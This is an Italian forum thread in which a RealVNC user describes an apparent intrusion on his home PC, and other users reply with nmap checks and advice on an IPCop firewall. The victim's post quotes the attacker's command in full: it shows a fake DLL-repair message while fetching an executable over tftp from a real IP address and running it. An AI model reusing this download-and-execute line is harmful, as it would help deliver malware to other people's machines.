| Precedente :: Successivo |
| Autore |
Messaggio |
tR4DiNg
Nuovo del Forum
Registrato: Mar 29, 2007
Messaggi: 1
|
 Inviato: Gio Mar 29, 2007 10:35 am Oggetto: RealVNC e le sue GRAVI falle di sicurezza..... |
 |
|
Vi descrivo la mia esperienza in proposito con questo programma.....Io ho la necessità di usarlo in quanto sto fuori casa quasi tutto il giorno e desidererei avere accesso remoto al mio pc in ogni istante....beh stamattina dopo ke il pc è rimasto acceso tutta la notte trovo 4 prompt di msdos aperti, il kaspersky ke affannato cercava di riparare i trojan trovati e sulla barra esegui questa riga di comando ....
%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 64.79.213.12 GET sskaml.exe & start sskaml&
Credo che qualcuno abbia tentato di bucare la mia shell pensando avessi qlk linea veloce x metterci su un server ftp o similari 
Ora mi impressiona il fatto come il tizio abbia potuto bypassare la password di REALVNC (so che esistono dei tools ke lo fanno)....io d'altro canto posseggo la versione 4.0 di REALVNC ENTERPRISE (cioè la + aggiornata)....raga....come posso risolvere x evitare che mi entrino?
Ripeto ho necessità di avere accesso remoto sul mio pc e con ThightVNC non riuscivo a farlo andare col mio router....eppure sono dentro DMZ sullo stesso....
Oltre alla facile soluzione di mettere screensaver con password utente allo sblocco....come posso alternativamente risolvere?
Se ho omesso qualcosa o vi servono altre info x capire meglio il mio problema....fate reply....sono qui
CIAO E GRAZIE A TUTTI |
|
| Torna in cima |
|
 |
billiejoex
Nuovo del Forum
Registrato: Sep 08, 2004
Messaggi: 6
|
| Inviato: Gio Mar 29, 2007 3:05 pm Oggetto: |
|
|
| Come fai a sapere che il problema è imputabile a VNC? |
|
| Torna in cima |
|
|
claudiocrack
ExStaff
Registrato: set 21, 2001
Messaggi: 1574
Località: USA
|
| Inviato: Sab Mar 31, 2007 4:31 pm Oggetto: |
|
|
fatti un
nmap -sV ipdellatuaconnessionealprovider
o
nmap -P0 ipdellatuaconnessionealprovider
e posta il risultato.
purtroppo i vncinjection sono frequentissimi.
se non puoi fare a meno di usare vnc maschera la tua rete con un firewall fisico montati un piccolo firewall con ipcop con un vecchio pc da li "nascondi" il tuo ip chiudi il ping alla rete rossa quella del collegamento all' isp e mascheri il reindirizzamento delle porte e lo giri a un log del firewall cosi tieni sotto controllo chi prova a farti danni.
ciao ciao |
|
| Torna in cima |
|
|
|
lunedì 01-dic-08 15:48
Complessivo: 100035
Persone Online:
Visitatori: 383
Iscritti: 3
Totale: 386
FAQ
Cerca
Gruppi utenti
Profilo
Messaggi Privati
Login
